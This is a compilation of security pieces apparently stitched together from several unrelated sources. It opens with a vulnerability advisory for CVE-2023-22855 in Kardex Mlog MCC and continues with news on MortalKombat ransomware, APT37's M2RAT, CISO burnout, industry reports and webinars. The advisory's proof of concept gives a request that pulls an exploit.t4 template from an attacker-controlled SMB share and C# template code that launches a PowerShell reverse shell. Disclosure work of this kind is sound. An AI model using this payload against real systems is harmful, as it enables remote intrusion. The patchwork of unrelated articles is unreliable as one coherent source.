Kardex Mlog MCC 5.7.12+0-a203c2a213-master allows remote code execution. It spawns a web interface listening on port 8088. A user-controllable path is handed to a path-concatenation method (Path.Combine from .NET) without proper sanitisation. This yields the possibility of including local files, as well as remote files on SMB shares. If one provides a file with the extension .t4, it is rendered with the .NET templating engine mono/t4, which can execute code.

Product: Kardex Mlog MCC  
Vendor: Kardex Holding AG  
Tested Version: 5.7.12+0-a203c2a213-master  
Fixed Version: inline patch - no new version number  
Vulnerability Type: Improper Control of Generation of Code ("RFI") - CWE-94  
CVSSv2 Severity: AV:A/AC:L/Au:N/C:C/I:C/A:C (Score 8.3)  
CVSSv3 Severity: AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H (Score 9.6)  
Solution Status: fixed Manufacturer Notification: 2022-12-13  
Solution Date: 2023-01-24  
Public Disclosure: 2023-02-07  
CVE Reference: CVE-2023-22855  
Authors of Advisory: Patrick Hener & Nico Viakowski

**Overview\[1\]**

> Kardex Mlog’s modular software solution Kardex Control Center manages material flow and warehouse management processes faster and more efficiently.

> From manual block warehouse and interface networking with intelligent partner systems to an automated intralogistics system connected to production lines and driverless vehicles, intelligent energy management for the automated stacker cranes and modern system visualization, the Kardex Control Center modules offer flexible solutions for your warehouse management.

**Vulnerability Details**

The .NET based software spawns a web interface listening on port 8088. This interface is meant to control and monitor the material flow.

The user controllable path is handed to a path concatenation function (Path.Combine) without proper sanitization. This yields the possibility to include local files, as well as remote files (SMB). The path is used in a function called getFile.

The following code snippet shows the vulnerable part of this function:

public MccHttpServerResult GetFile(string path, string acceptEncoding, string queryString \= null)
		{
			MccHttpServerResult result4;

\[... snip ...\]

else
	{
		string getfileName \= (path \== "/") ? "index.html" : path.Substring(1).Replace("/", Path.DirectorySeparatorChar.ToString(CultureInfo.InvariantCulture));
		string fileName \= Path.Combine(this.RootDirectory(), getfileName);
		string originalFileName \= fileName;

The .Net function Path.Combine also is able to concatenate remote targets. For example using \\ipaddress you can include files from a remote samba server.

Further down the request flow, the application is checking for the MIME type of the file retrieved.

Depending on the MIME type the content is either sent through a import/export procedure or rendered as mono/t4 template. The function getMimeType will return t4 if the included file is ending with an extension of .t4.

This is where the File Inclusion can be escalated to a Remote Code Execution. The mono/t4 templating engine allows the use of C# to evaluate code. This enables an attacker to gain code execution and eventually spawn a reverse shell.

bool flag15 \= File.Exists(fileName);
	if (flag15)
		{
			using (FileStream f \= new FileStream(fileName, FileMode.Open, FileAccess.Read, FileShare.ReadWrite))
			{
				byte\[\] bytes \= new byte\[f.Length\];
				f.Read(bytes, 0, bytes.Length);
				bool flag16 \= mime2 \== "t4";
				if (flag16)
					{
						return this.runTemplatingEngine(bytes, responseHeaders, queryString);
					}

**Proof of Concept (PoC)**

The following request will include a remote file from an smb share. For this to work the attacker has to spawn an smb server (for example using smbserver.py from Impacket\[2\]).

    GET /\\attacker-ip/share/exploit.t4 HTTP/1.1
    Host: vulnearble.host.internal:8088
    Content-Type: text/html
    User-Agent: curl/7.86.0
    Accept: */*
    Connection: close
    

The exploit.t4 looks like this:

<#@ template language="C#" #\>
<#@ Import Namespace="System" #\>
<#@ Import Namespace="System.Diagnostics" #\>

Proof of Concept - SSTI to RCE
RCE running ...

<#
var proc1 = new ProcessStartInfo();
string anyCommand;
anyCommand = "powershell -e revshell-base64-blob";

proc1.UseShellExecute = true;
proc1.WorkingDirectory = @"C:\\Windows\\System32";
proc1.FileName = @"C:\\Windows\\System32\\cmd.exe";
proc1.Verb = "runas";
proc1.Arguments = "/c "+anyCommand;
Process.Start(proc1);
#\>

Enjoy your shell, good sir :D

The exploit above will execute cmd.exe and launch a powershell to execute a reverse shell. You can easily generate a reverse shell blob using revshells.com\[3\].

A full exploit spawning a reverse shell was created\[4\].

**Solution**

The user supplied data should be sanitized before using it in the Path.Combine function.

**Disclosure Timeline**

2022-12-13: Vulnerability discovered  
2022-12-13: Vulnerability reported to manufacturer  
2023-01-24: Solution provided by manufacturer  
2023-02-07: Public disclosure of vulnerability

**References**

\[1\] Vendor Website: https://www.kardex.com/en/mlog-control-center  
\[2\] Impacket Git Repository: https://github.com/SecureAuthCorp/impacket  
\[3\] Reverse Shell Generator: https://www.revshells.com/  
\[4\] Exploit on Exploit-DB (tbd): https://www.exploit-db.com/exploits/xxxxx  
\[5\] Blog Post Advisory: https://hesec.de/posts/CVE-2023-22855  
\[6\] Personal Github Repo for Advisory: https://github.com/patrickhener/CVE-2023-22855  
\[7\] Blog Post Thinking Objects: https://to.com/blog/advisory-kardex-mlog-CVE-2023-22855

**Credits**

This security vulnerability was found by Patrick Hener and Nico Viakowski.

E-Mail: patrickhener@posteo.de  
E-Mail: n.viakowski@pm.me

**Disclaimer**

The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible.

**Copyright**

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

CVE-2023-22855: CVE-2023-22855/advisory.md at main · patrickhener/CVE-2023-22855

By Habiba Rashid
Hackers are deploying the MortalKombat ransomware and Laplas Clipper malware in a financially motivated campaign against victims worldwide.
This is a post from HackRead.com Read the original post: New MortalKombat Ransomware Attack Aiming for Crypto Wallets

The ransomware encrypts all files on the infected system, including those in the trash bin and virtual machine files. It corrupts Windows Explorer, deletes folders and files from the start-up menu, and disables the Run Command.

Cisco’s Talos cybersecurity team has been tracking an unidentified threat actor behind a ransomware campaign that uses a variant of the Xorist commodity ransomware MortalKombat, as well as a GO variant of the **Laplas Clipper malware**.

The detailed advisory by Talos states that, once a computer is infected, it displays a Mortal Kombat 11 wallpaper along with a note instructing the victim to contact the attackers using **qTox**. For your information, qTox is an instant messaging app that is available for download via GitHub.

The email claims that the user’s payment has timed out and carries an attachment, which contains the malicious payload in a zipped file with a name that appears to be a CoinPayments transaction number.

Upon opening the attachment, a **multi-stage attack chain** is initiated, during which the actor delivers either malware or ransomware. The ransomware encrypts all files on the infected system, including those in the trash bin and virtual machine files. It corrupts Windows Explorer, deletes folders and files from the start-up menu, and disables the Run Command.

In case the email attachment drops Laplas Clipper alternatively, the victim’s **cryptocurrency wallet is targeted**. The malware monitors the computer’s clipboard for cryptocurrency wallet addresses.

If one is found, it is sent to the attacker’s server, where a Clipper bot creates a lookalike address owned by the hacker and then replaces the clipboard entry. This, according to Cisco Talos’ **blog post**, allows the threat actors to receive the funds that the user attempts to transfer into their own wallet.

> “The loader script will run the dropped payload as a process in the victim’s machine, then delete the downloaded and dropped malicious files to clean up the infection markers.”
> 
> _Cisco Talos Intelligence Group_

The campaign has reportedly been targeting individuals, small businesses, and large corporations alike in the United States, England, Turkey, and the Philippines.

The best way to protect yourself from being affected by **similar ransomware campaigns** is to be wary of suspicious emails from services you use. Until you ensure that the email you received is from a legitimate entity, it is highly advised that you do not click on any attachments.

Keeping the nature of this ransomware campaign in mind, Cisco Talos also encouraged companies to remain vigilant when performing cryptocurrency transactions.

1.  **Ransomware asks users to play Click Me game**
2.  **Ransomware tells users to play Japanese game**
3.  **New ransomware asks victims to play PUBG game**

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

New MortalKombat Ransomware Attack Aiming for Crypto Wallets

Retail & Hospitality ISAC invites industry leaders, experts, and innovators to submit proposals for presentations and panel discussions.

**Vienna, VA (February 15, 2023)** **–** The Retail and Hospitality Information Sharing and Analysis Center (RH-ISAC) is now accepting speaker submissions for the 2023 RH-ISAC Cyber Intelligence Summit. The event, which is the premier conference for retail and hospitality cybersecurity professionals, will bring together experts from across the industry to discuss the latest threats and solutions in the field.

The conference will focus on the challenges facing the retail and hospitality industries in the face of an ever-increasing number of cyber threats, and it will provide a platform for attendees to learn from the best and brightest in the field.

RH-ISAC invites industry leaders, experts, and innovators to submit proposals for presentations and panel discussions that cover topics such as threat intelligence, incident response, risk management, and security operations. The goal of the RH-ISAC Summit is to provide attendees with actionable insights, practical solutions, and meaningful connections that can help them better protect their organizations and customers from cyber threats.

“We’re thrilled to once again bring together the brightest minds in retail and hospitality cybersecurity for our annual summit,” said RH-ISAC President Suzie Squier. “The call for speakers is a critical component of the event, and we’re excited to hear from experts who can share their knowledge and experiences with our community.”

The RH-ISAC Cyber Intelligence Summit will take place October 2–4 in Dallas, Texas. To submit a speaker proposal, visit https://rhisac.org/events/call-for-presentations/. The deadline for submissions is May 5.

For more information about the RH-ISAC Cyber Intelligence Summit, visit https://summit.rhisac.org/.

**ABOUT RH-ISAC**

The Retail & Hospitality Information Sharing and Analysis Center (RH-ISAC) is the sector’s operational community for sector-specific cybersecurity information and intelligence sharing and collaboration. As such, the RH-ISAC not only connects and serves its members,italso seeks to partner collaboratively with all trade associations in the sector to support security development and maturity with the goal of building better security for the retail, hospitality, and travel industries through partnership and collaboration. For more information, visit www.rhisac.org.

Call for Speakers Now Open for the RH-ISAC Cyber Intelligence Summit

Information security is a high-stakes field with sky-high expectations. Here's how CISOs can offset the pressures and stay healthy.

John has built a stellar reputation as a problem solver and cyber defender. Yet, today, John, the chief information security officer of a major manufacturing company, is frantically trying to find out why the CEO had been unable to retrieve or send any emails for the past four hours. The CEO is extremely irate, and as John takes in the barrage of anger, John begins to feel fear sinking into his chest. Would this incident tarnish his hard-earned reputation? Will he lose his job?

John prides himself on having answers and receiving praise for fixing problems, so he is taking this situation to heart. He started his IT security career as an analyst. He was incredibly talented at spotting gaps in security posture and determining creative ways to close those gaps. John's intelligence and innovation helped him quickly climb the ranks to CISO. However, each level of promotion brought with it increasing challenges and demands.

As an analyst, John's responsibility was confined to himself and his specific role. The CISO role has widened John's scope of responsibility immensely. He now has to manage a team of people with varying personalities; budget and request funds for projects; communicate and build relationships with other business leaders within his company; negotiate and buy products and services from vendors; and meet a number of other responsibilities. John also has to find time to be a husband, to be a father, and to take care of his own physical and mental health.

It doesn't help that John's leadership expects the IT security department to protect 100% against malicious threats targeting their company. John and his team are expected to perform perfectly. It's an unrealistic and unreasonable expectation, which leads to high stress and burnout. Unfortunately, many are in this position.

**What Leaders Should Do**

Had there been someone coaching John, he would have been taught about effective leadership traits that would help him have less emotional fallout in this scenario. There are three core tactics John could use to keep from questioning his own efficacy or suffering burnout.

**1\. See mistakes as a learning opportunity.** Mistakes happen. They are a part of life. Those who thrive see mistakes as learning opportunities and ways to get better. Accept any mistake as what it is: an outcome you did not want. Investigate what led to that outcome, determine what alternative choices were available, and understand what better option exists moving forward.

**2\. Control the controllables.** There are not a lot of things in our control. For example, we have no control over how others respond (like a yelling CEO), if a salesperson gives us all the information we need to make an educated purchase, if employees leave the company, if it's going to rain, or a litany of other things. Focusing on things outside of our control will lead to increased fear and manifesting more of what we do not want.

However, we do have the ability to focus on what we have control over. We have control over how we respond to situations; we have control over our energy, effort, and attitude; and we have control over how we choose to model for others. Focusing on what we control will not guarantee things work out. However, it will allow us to have more sanity and certainty we are doing the right things at the right time, which will increase our chances of success.

**3\. Remain calm.** When threats to our safety (real or perceived) occur, we instinctively go into survival mode — fight, flight, or freeze. In times of fear and panic, our cortex disconnects from the cerebellum, known in psychology as a "flipped lid." We lose our ability to critically think and problem-solve. Our breathing also becomes faster and shorter. You can get back to calm through your breath.

Box breathing is a simple and effective technique for recovering a mental space in which you can problem-solve. It employs four equal parts, just like the sides of a box. You inhale for 5 seconds, hold at the top of that breath for 5 seconds, exhale for 5 seconds, and hold at the bottom of that exhale for 5 seconds. Repeat this process for a minimum of 5 rounds or more.

**Reduce Stress to Reduce Turnover**

Stress is on the rise within the IT security space, which leads to problems like burnout and employee turnover. The 2022 Global Chief Information Security Officer (CISO) Survey from management consulting firm Heidrick & Struggles shows some concerning statistics. The survey showed stress (60%) and burnout (53%) were the top responses as being the most significant personal risks to CISOs in the United States.

People are leaving CISO roles for other operational positions, pursuing consulting opportunities, or not entering the CISO roles altogether. This exacerbates two big issues in the industry: not enough talent to fill seats and employee retention.

"They're \[CISOs\] choosing to punch out," Matt Aiello, partner and leader of the cyber practice at Heidrick & Struggles, told CNBC recently. "What we're hearing in off-line conversations is that it's a great role, but it's very hard and the regulatory pressures are increasing, and that makes being a CISO even more challenging."

Awareness and prioritization of mental health support and performance coaching is growing in this industry. In 2018, for example, the Black Hat conferences introduced a community track focused on mental health and other nontechnical topics that's continued to this day.

Being an IT security leader is hard. There are so many challenges to being effective in the role — unrealistic expectations of protecting your organization 100%, not getting the funding you need to purchase resources, difficulties finding and retaining good talent, etc. Ineffective leadership skills make this job harder. You and your team can thrive if you learn how to lead effectively and avoid burnout.

3 Ways CISOs Can Lead Effectively and Avoid Burnout

CISOs need to define their risk tolerance, identify specific critical data, and make changes based on strategic business goals.

The past few years have been a bumpy ride all around. 2022 was supposed to be a breather for CISOs as the uncertainty surrounding the pandemic largely subsided. Sadly, they found themselves coming to terms with the new "never normal" instead.

A soaring cost of living, geopolitical conflicts, catastrophic climate crisis, and a rapidly evolving regulatory environment all will shape the cybersecurity landscape this year. Newer threats have emerged and older ones have evolved. Critical infrastructure, public service delivery, and people's privacy all seem to be in the line of fire. And with ongoing digital transformation initiatives, exponential data growth, limited funds, and an ongoing skills shortage, CISOs and their teams, it seems, are barely holding it together.

**Waypoints on Path to Action**

Keeping up with emerging threats and challenges in 2023 can help organizations get on the path to developing a coherent security strategy.

**1\. Cyberattacks increase, tactics evolve:** Ransomware incidents dropped by 34% earlier in 2022, only to roar back with a vengeance. Ransomware has evolved to double and triple extortion with data theft and denial of service. We'll see an uptick in stolen data being sold on Dark Web forums and later being used in highly targeted phishing attacks.

The underground cybercrime landscape is also shifting from cybercrime-as-a-service to cyber mercenaries for hire. Expect cybercriminals and nation-state actors to hire highly skilled cyber mercenaries for granular tasks that can lead to major attacks and breaches. These attacks will be very impactful but near impossible to trace.

**2\. Supply chain risks balloon:** Supply chain security risks quickly bleed into the business side of operations, often bringing them to a halt. These risks will likely balloon this year as businesses outsource the infrastructure, applications, and services they need to multiple cloud and software-as-a-service (SaaS) vendors. With so many external providers and partners, attackers will target the most vulnerable ones to gain easy access.

**3\. Data-well poisoning attacks emerge:** Artificial intelligence-powered systems depend on the integrity of the data they're fed to make sound decisions. As businesses get real with AI in 2023, data will become an invaluable asset as well as a liability. Cybercriminals will be targeting data wells to manipulate systems into making rogue decisions. Beyond confidentiality and availability, data integrity is now at risk.

**4\. Tech, threat, and regulatory environments continually change:** Threats are evolving, and so is the regulatory landscape. General and country-specific regulations will compel organizations to ensure ethical data collection, storage, and use. These changes will likely keep CISOs on their toes, trying to preserve all the good pieces of the security pie while also ensuring enough flexibility to accommodate new changes.

**Creating a Business-Based Security Strategy**

Here's what organizations in general need to focus on to create a security strategy that can steer them through what appears will be a challenging year for security, economy, and trade.

**1\. Aligning security with business strategy:** CISOs are responsible for assuring business executives that cybersecurity is a business risk, not just an IT issue. As boards determine a business's strategic direction, CISOs must incorporate security into that process. To do that, addressing cyber-risks should frequently be on the agenda for board meetings.

A CISO who appreciates the business tactic of developing a security strategy that supports the organization's goals probably won't have to chase after the board for security funds and resources.

**2\. Building cyber resiliency:** Cyber resiliency is an organization's preparedness to deal with the impact of threats that can't be predicted or prevented. The first step to achieving cyber resilience is to adopt a governance framework for monitoring cyber activities, including partner collaborations and relevant regulatory changes. Organizations must also develop cyber situational awareness through cyber threat intelligence gathering, analysis, and sharing.

Next, they should identify and prioritize critical assets and continually evaluate them as their value changes. Based on the insights they gather, they need to plan and rehearse for just-in-case scenarios. Rehearsed incident-response plans can cut down the cost of a data breach almost by half.

Building cyber resilience is an ongoing process because threats evolve, businesses mature, and the value of different assets changes. Keeping up with the process, organizations can prevent, detect, and respond to emerging threats and their aftermath immediately and effectively.

**3\. Determining cyber-risk tolerance:** Organizations need to determine and define their risk tolerance regarding cyber-loss incidents. And that involves evaluating the dependencies, stability, and security of external partners and providers as well. Monitoring and protecting assets and data is not about boiling the ocean. It's about starting small, being very specific in identifying critical data elements, and then ensuring their security and integrity at all stages of the data life cycle.

A similar, selective approach should work for addressing changes in regulatory and compliance requirements, too. Organizations don't have the time or resources to do it all. They must identify what matters and make changes selectively based on their strategic business goals.

Addressing cyber-risks isn't a static process. Security teams know it, and the boards must realize it. The world of work is changing, and policies and procedures will have to reflect that. This rapidly evolving work and security environment can cause cyber fatigue and mental health challenges. Organizations must prioritize employees' education, satisfaction, and mental health. Otherwise, we'll also be witnessing a surge in insider threats on top of everything else.

Build Cyber Resiliency With These Security Threat-Mitigation Considerations

**COMMERCE, Mich.****,** **Feb. 15, 2023** **/PRNewswire/ --** Nuspire, a leading managed security services provider (MSSP), today announced the release of its Q4 and Year in Review 2022 Threat Report. The quarterly report provides a comprehensive analysis of the threat landscape, parsing malware, botnet and exploit data as well as breaking down the tactics, techniques and procedures (TTPs) favored by cybercriminals.

Nuspire's latest report validates the presumption that 2022 yielded the most threat activity in history. While Q4 saw dips across all three sectors Nuspire monitors, including malware, botnets and exploits, the net sum for the year shows a marked increase, especially in the case of exploits, which nearly doubled.

"We saw some normal ebbs in threat activity over the year, but the surges were stunning, delivering a volume of attacks we've never seen before," said J.R. Cunningham, Chief Security Officer at Nuspire. "While many of the methods focused on securing quick wins, like phishing and exploiting unpatched vulnerabilities, we also saw a rise in more coordinated threat group attacks on large organizations and critical infrastructure. Expect 2023 to have more of this activity, as well as adversaries' increased attention toward attacking consumer IoT devices."

Notable findings from Nuspire's quarterly report include:

*   Exploit activity grew by 105% in Q4 2022, with total 2022 exploits nearly doubling over 2021. Brute forcing was the most popular tactic, increasing by nearly 400% over Q3 2022.
*   Malware jumped nearly 35% in Q4, with its year-over-year increase reaching 6.85%. Nuspire attributes this relatively smaller increase to the positive effects of Microsoft's decision to block Visual Basic for Applications (VBA) macros by default for Office files. 
*   Botnets jumped by 30% in 2022, with banking trojan Torpig Mebroot comprising more than 40% of all botnet activity throughout the year.   

"If 2022 showed us anything, it's that threat actors are not only increasingly adept at finding ways to circumnavigate established cybersecurity defenses, but also, they bring a level of agility that lets them quickly course correct when a vector loses viability," said Craig Robinson, Research VP for Security Services at IDC. "We've seen the emergence of new security technologies aimed at thwarting a more creative and sophisticated adversary population, but no specific technology can replace the value of targeted threat intelligence to understand what's out there, how they're doing it and what you can do to protect yourself."

Access Nuspire's Q4 and Year in Review 2022 Threat Report to view the data and learn key mitigation strategies for protecting your organization's environment.

**About Nuspire** 

_Nuspire is a managed security services provider (MSSP), offering managed security services (MSS), managed detection and response (MDR), endpoint detection and response (EDR) that supports best in breed EDR solutions, and cybersecurity consulting services (CSC) that includes incident readiness and response, threat modeling, digital forensics, technology optimization, posture assessments and more. Our self-service, technology-agnostic platform, myNuspire, allows greater visibility into your entire security program. Powered by the self-healing always on Nuspire Cyber X Platform (CXP), myNuspire will help CISOs alleviate the pain associated with tech sprawl, provide intelligence driven recommendations, solve for alert fatigue and help their clients become more secure over time. Our deep bench of cybersecurity experts, award-winning threat intelligence and three 24×7 security operations centers (SOCs) detect, respond, and remediate advanced cyber threats. Our client base spans thousands of enterprises from midsized to large enterprises that span across multiple industries and geographic footprints. For more information, visit_ www.nuspire.com _and follow us at on LinkedIn @Nuspire._

SOURCE Nuspire

Report Reveals Record-Breaking Year for Cyber Threats

**KANSAS CITY, Missouri, and MIAMI (****S4X23****) —**  In an effort to improve cybersecurity resiliency for critical infrastructure environments, 1898 & Co. is launching Managed Threat Protection & Response, a new proactive threat hunting and response capability to its existing Managed Security Services (MSS) solution. 1898 & Co. is the business, technology and cybersecurity consulting arm of Burns & McDonnell, a 100% employee-owned engineering, construction and architecture firm.

Since the beginning of 2020, cyberattacks aimed at sectors that are critical to society have increased by more than 400%. Of those attacks, 45% were ransomware attacks that targeted or impacted industrial control systems. Left undetected, cyber sabotage within critical infrastructure environments like the power grid and water systems result in service disruptions, infrastructure damage and negative impacts to the environment and to public health and safety.

Unlike other firms that focus mostly on information technology cybersecurity, 1898 & Co. is one of the first firms to apply their operational technology (OT) and industrial control systems (ICS) cybersecurity specialization into managed security services.  

“Managing security for ICS and OT is a rare capability for a reason: Critical infrastructure is a highly complex environment,” says Chris Underwood, vice president and general manager of 1898 & Co. “At 1898 & Co., our consultants live and breathe critical infrastructure. We’ve worked in the industry and for the industry, so we have a deep understanding of its challenges.”

1898 & Co.’s Managed Threat Protection & Response service, through intelligence enrichment and insights gained from collective defense information sharing, leverages a variety of indicators and tactics, techniques and procedures to provide 24x7 threat monitoring and detection. 1898 & Co.’s service also proactively hunts for possible intrusions within clients’ OT and ICS.

Industry analysts note that incidents in these environments are inevitable, however damage and fallout can be lessened through rapid detection and response capabilities. Additionally, regulatory measures continue to evolve in response to the heightened threats posed to critical infrastructure companies. For example, Federal Energy Regulatory Commission recently directed the North American Electric Reliability Corporation to develop reliability standards requiring Internal Network Security Monitoring standards. These new standards require power utilities to implement monitoring and detection and identify anomalous activity by way of regulatory mandate, a significant development for that industry.

“Cyber-related risk remains a top concern and consideration for every critical infrastructure company,” says Matt Morris, managing director of Security & Risk Consulting, 1898 & Co. “We continue to see increasing digitization, threats and corresponding regulation. Given the increasing talent shortage, keeping critical processes operational is getting more and more complicated. As specialists who focus on critical infrastructure cybersecurity, we uniquely understand how these environments are designed, built and operated, and we have an unmatched team of engineers and consultants at our back.”

The new capability and MSS services from 1898 & Co. are now available and uniquely leverages multiple on-premise monitoring and detection partner platforms, including Dragos, Claroty and Armis, with a limited number of platforms expected to be added over time. The MSS provides active response via CrowdStrike Falcon platform, an industry-leading security solution. The MSS service also provides the additional value of OT asset discovery, inventory and reporting to include vulnerabilities and network topology mapping.

1898 & Co. has also collaborated with various information sharing and analysis centers (ISACs) to access various industry-specific indicators of compromise and tactics, techniques, and procedures. Initial affiliates include the E-ISAC (electric utilities) and WaterISAC (water utilities), with additional ISACs on the roadmap.   
This summer, 1898 & Co. will launch an upgraded, next generation security operations center (SOC) for advanced protection and response.

**About 1898 & Co.**

1898 & Co. is a global business and technology consultancy that brings together a unique blend of engineers and industry leaders to deliver strategic business insights and solutions for critical infrastructure industries. We partner with clients to plan, invest, secure and optimize critical assets for a successful, sustainable future. For more information, visit 1898andCo.com.

**About Burns & McDonnell**

Burns & McDonnell is a family of companies bringing together an unmatched team of more than 13,500 engineers, construction and craft professionals, architects, planners, technologists, and scientists to design and build our critical infrastructure. With an integrated construction and design mindset, we offer full-service capabilities. Founded in 1898 and working from 70 offices globally, Burns & McDonnell is 100% employee-owned. Learn how we are designed to build.

1898 & Co Launches New Cybersecurity Service for Critical Infrastructure

The North Korea-linked threat actor tracked as APT37 has been linked to a piece of new malware dubbed M2RAT in attacks targeting its southern counterpart, suggesting continued evolution of the group's features and tactics.
APT37, also tracked under the monikers Reaper, RedEyes, Ricochet Chollima, and ScarCruft, is linked to North Korea's Ministry of State Security (MSS) unlike the Lazarus and

Threat Intelligence / Malware

The North Korea-linked threat actor tracked as **APT37** has been linked to a piece of new malware dubbed **M2RAT** in attacks targeting its southern counterpart, suggesting continued evolution of the group's features and tactics.

APT37, also tracked under the monikers Reaper, RedEyes, Ricochet Chollima, and ScarCruft, is linked to North Korea's Ministry of State Security (MSS) unlike the Lazarus and Kimsuky threat clusters that are part of the Reconnaissance General Bureau (RGB).

According to Google-owned Mandiant, MSS is tasked with "domestic counterespionage and overseas counterintelligence activities," with APT37's attack campaigns reflective of the agency's priorities. The operations have historically singled out individuals such as defectors and human rights activists.

"APT37's assessed primary mission is covert intelligence gathering in support of DPRK's strategic military, political, and economic interests," the threat intelligence firm said.

The threat actor is known to rely on customized tools such as Chinotto, RokRat, BLUELIGHT, GOLDBACKDOOR, and Dolphin to harvest sensitive information from compromised hosts.

"The main feature of this RedEyes Group attack case is that it used a Hangul EPS vulnerability and used steganography techniques to distribute malicious codes," AhnLab Security Emergency response Center (ASEC) said in a report published Tuesday.

The infection chain observed in January 2023 commences with a decoy Hangul document, which exploits a now-patched flaw in the word processing software (CVE-2017-8291) to trigger shellcode that downloads an image from a remote server.

The JPEG file uses steganographic techniques to conceal a portable executable that, when launched, downloads the M2RAT implant and injects it into the legitimate explorer.exe process.

While persistence is achieved by means of a Windows Registry modification, M2RAT functions as a backdoor capable of keylogging, screen capture, process execution, and information theft. Like Dolphin, it's also designed to siphon data from removable disks and connected smartphones.

"These APT attacks are very difficult to defend against, and the RedEyes group in particular is known to primarily target individuals, so it can be difficult for non-corporate individuals to even recognize the damage," ASEC said.

This is not the first time CVE-2017-8291 has been weaponized by North Korean threat actors. In late 2017, the Lazarus Group was observed targeting South Korean cryptocurrency exchanges and users to deploy Destover malware, according to Recorded Future.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

North Korea's APT37 Targeting Southern Counterpart with New M2RAT Malware

Bad actors love to deliver threats in files. Persistent and persuasive messages convince unsuspecting victims to accept and open files from unknown sources, executing the first step in a cyber attack. 
This continues to happen whether the file is an EXE or a Microsoft Excel document. Far too often, end users have an illusion of security, masked by good faith efforts of other users and (

Bad actors love to deliver threats in files. Persistent and persuasive messages convince unsuspecting victims to accept and open files from unknown sources, executing the first step in a cyber attack.

This continues to happen whether the file is an EXE or a Microsoft Excel document. Far too often, end users have an illusion of security, masked by good faith efforts of other users and (ineffective) security controls. This creates a virality effect for ransomware, malware, spyware, and annoying grayware and adware to be spread easily from user to user and machine to machine. To stop users from saying, "I reject your reality and substitute my own!" – it's time to bust some myths about file-based attacks.

**Testing in three! Two! One!** **Register here** and join Zscaler's Vinay Polurouthu, Principal Product Manager, and Amy Heng, Product Marketing Manager, to:

*   Bust the 9 most common assumptions and myths about file-based threats
*   Uncover the latest evasion trends and detect stealthy delivery methods
*   Prevent patient zero infections and zero-day security events from unknown files

****The fundamental problems when it comes to stopping file-based threats****

Digital communication would not be possible without file sharing. Whether we are opening an exported Excel file with a Salesforce report or downloading a new note taking software, we are using files to share information and perform critical tasks.

Much like other habitual actions like driving, we develop assumptions and an over reliance on heuristics towards files and the security controls that protect us against viruses and malware. When our guardrails are down, we are susceptible to file-based attacks.

File-based attacks are attacks that use modified files that contain malicious code, script, or active content to deliver threats to users or devices. Threat actors use social engineering techniques to convince users to open and execute files and launch cyber attacks. Beyond preying on human behavior, threat actors program evasive techniques into their files like obfuscation information or file deletion, making it difficult for existing tools to detect threats.

****Preventing file-based attacks stops zero-day attacks & patient-zero infections****

No one wants to be the first documented victim of a cyber attack. However, file-based attacks continue to be successful because businesses still rely on signature-based detection.

The Zscaler ThreatLabz research team discovered the infostealer malware hiding in pirated software. The threat actors used fake shareware sites where visitors would download a file that masqueraded as cracked software. Instead of the intended software, the payload contained RedLine or RecordBreaker malware, which collects stored browser passwords, auto-complete data, and cryptocurrency files and wallets. This attack is difficult to detect because the threat actors would generate a new password-protected zip file with every download transaction. Listing MD5's would be ineffective.

Stopping zero-day attacks and patient-zero infections requires inline protection and intelligent, dynamic analysis.

****A webinar to figure out what's fact and what's fiction about file-based threats****

Leave your assumptions about file-based threats at the door. We gathered nine most common myths about files, ranging from how endpoint security may not be enough to block (or not to block) Macros in Microsoft documents.

Ready to bust some myths? **Register for the webinar here**.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Webinar — A MythBusting Special: 9 Myths about File-based Threats

Explosive growth of devices associated with the Internet of Things and operational technologies gives attackers a larger pool of targets.

Internet of Things (IoT) and operational technology (OT) devices represent a rapidly expanding, often unchecked, risk surface that is largely driven by the technology's pervasiveness, vulnerability, and cloud connectivity. This has left a wider array of industries and organizations vulnerable and opened the door for damaging infrastructure attacks. 

Microsoft recently identified unpatched, high-severity vulnerabilities in 75% of the most common industrial controllers in customer OT networks. Keep reading to learn more about these cyber-risks to critical infrastructure and what you can do to mitigate them.

**IoT's Growth Has Outstripped Device Security**

Over the past year, Microsoft has observed threats exploiting devices in almost every monitored and visible part of an organization. This includes traditional IT equipment, OT controllers, and IoT devices like sensors and cameras. Many organizations have adopted a converged, interconnected model of OT and IoT in recent years. This trend has caused attackers' presences in these environments and networks to grow exponentially.

IDC estimates there will be 41.6 billion connected IoT devices by 2025, a growth rate higher than traditional IT equipment. And although the security of IT equipment has strengthened in recent years, IoT and OT device security has not kept pace. Threat actors are exploiting these devices accordingly by compromising newly networked devices to gain access to sensitive critical infrastructure networks.

Take the recent Boa Web server vulnerabilities, for example. Microsoft discovered these vulnerabilities during an investigation of continued attacks on Indian power grid assets by Chinese state-sponsored groups. Despite being discontinued in 2005, the Boa Web server is still used by different vendors across a variety of IoT devices and popular software development kits. Data from the Microsoft Defender Threat Intelligence platform identified more than 1 million Internet-exposed Boa server components around the world over the span of a week. Without developers managing the Boa Web server, its known vulnerabilities create an opening for attackers to silently gain access to networks by collecting information from files.

**Nation-States Targeting Critical Infrastructure**

It is important to remember that attackers can have varied motives. Russia's cyberattacks against Ukraine, as well as other state-sponsored cybercriminal activity, demonstrate that some nation-states will target critical infrastructure in order to achieve military and economic objectives.

Threat actors have more varied ways of mounting large-scale attacks as the cybercriminal economy expands and malicious software targeting OT systems becomes more prevalent and easier to use. 

Ransomware attacks, previously perceived as an IT-focused attack vector, are today affecting OT environments. This can be seen in instances like the Colonial Pipeline attack, where OT systems and pipeline operations were temporarily shut down while incident responders worked to identify and contain the spread of ransomware on the company's IT network. Adversaries realize that the financial impact and extortion leverage of shutting down energy and other critical infrastructures is far greater than other industries.

Microsoft has observed Chinese-linked threat actors targeting vulnerable home and small-office routers in order to compromise these devices as footholds. This provides new address space that is less associated with their previous campaigns — giving them a new foothold from which to launch future attacks.

**Secure Your OT and IoT**

While the prevalence of IoT and OT vulnerabilities presents a challenge for all organizations, critical infrastructure is at increased risk. Disabling critical services, not even necessarily destroying them, is a powerful lever.

If organizations are to secure their IoT and OT systems, there are a number of recommendations that should be put in place.

● **Identify your vulnerabilities:** It's important to map out business-critical assets in IT and OT environments so you can fully understand your landscape and its innate weaknesses.

